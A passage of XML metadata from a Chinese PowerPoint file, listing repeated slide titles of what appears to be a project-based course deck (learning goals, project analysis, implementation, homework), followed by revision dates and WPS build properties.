      <vt:lpstr>284_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>285_第一PPT，www.1ppt.com</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>【学习目标】</vt:lpstr>
      <vt:lpstr>【项目分析】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【项目实例】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目训练】</vt:lpstr>
      <vt:lpstr>【项目评价】</vt:lpstr>
      <vt:lpstr>【作业布置】</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>【学习目标】</vt:lpstr>
      <vt:lpstr>【项目分析】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【项目实例】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目训练】</vt:lpstr>
      <vt:lpstr>【项目评价】</vt:lpstr>
      <vt:lpstr>【作业布置】</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>【学习目标】</vt:lpstr>
      <vt:lpstr>【项目分析】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【项目实例】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目训练】</vt:lpstr>
      <vt:lpstr>【项目评价】</vt:lpstr>
      <vt:lpstr>【作业布置】</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>【学习目标】</vt:lpstr>
      <vt:lpstr>【项目分析】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【项目实例】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目训练】</vt:lpstr>
      <vt:lpstr>【项目评价】</vt:lpstr>
      <vt:lpstr>【作业布置】</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>【学习目标】</vt:lpstr>
      <vt:lpstr>【项目分析】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【项目实例】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目训练】</vt:lpstr>
      <vt:lpstr>【项目评价】</vt:lpstr>
      <vt:lpstr>【作业布置】</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>【学习目标】</vt:lpstr>
      <vt:lpstr>【项目分析】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【项目实例】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目训练】</vt:lpstr>
      <vt:lpstr>【项目评价】</vt:lpstr>
      <vt:lpstr>【作业布置】</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>【学习目标】</vt:lpstr>
      <vt:lpstr>【项目分析】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【项目实例】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目训练】</vt:lpstr>
      <vt:lpstr>【项目评价】</vt:lpstr>
      <vt:lpstr>【作业布置】</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>【学习目标】</vt:lpstr>
      <vt:lpstr>【项目分析】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【项目实例】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目训练】</vt:lpstr>
      <vt:lpstr>【项目评价】</vt:lpstr>
      <vt:lpstr>【作业布置】</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>【学习目标】</vt:lpstr>
      <vt:lpstr>【项目分析】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【项目实例】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目训练】</vt:lpstr>
      <vt:lpstr>【项目评价】</vt:lpstr>
      <vt:lpstr>【作业布置】</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>【学习目标】</vt:lpstr>
      <vt:lpstr>【项目分析】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【项目实例】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目训练】</vt:lpstr>
      <vt:lpstr>【项目评价】</vt:lpstr>
      <vt:lpstr>【作业布置】</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>【学习目标】</vt:lpstr>
      <vt:lpstr>【项目分析】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【项目实例】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目训练】</vt:lpstr>
      <vt:lpstr>【项目评价】</vt:lpstr>
      <vt:lpstr>【作业布置】</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>【学习目标】</vt:lpstr>
      <vt:lpstr>【项目分析】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【项目实例】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目训练】</vt:lpstr>
      <vt:lpstr>【项目评价】</vt:lpstr>
      <vt:lpstr>【作业布置】</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>【学习目标】</vt:lpstr>
      <vt:lpstr>【项目分析】</vt:lpstr>
      <vt:lpstr>【相关知识】</vt:lpstr>
      <vt:lpstr>【项目实例】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目实施】</vt:lpstr>
      <vt:lpstr>【项目训练】</vt:lpstr>
      <vt:lpstr>【项目评价】</vt:lpstr>
      <vt:lpstr>【作业布置】</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <LinksUpToDate>false</LinksUpToDate>
  <SharedDoc>false</SharedDoc>
  <HyperlinksChanged>false</HyperlinksChanged>
  <AppVersion>14.0000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
  <dc:creator/>
  <cp:lastModifiedBy>Dreamy</cp:lastModifiedBy>
  <cp:revision>95</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-05-27T04:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-18T02:52:26Z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ICV">
    <vt:lpwstr>6DE6838DA2554280A810F3CA733E4729_13</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.19770</vt:lpwstr>
  </property>
</Properties>
</file>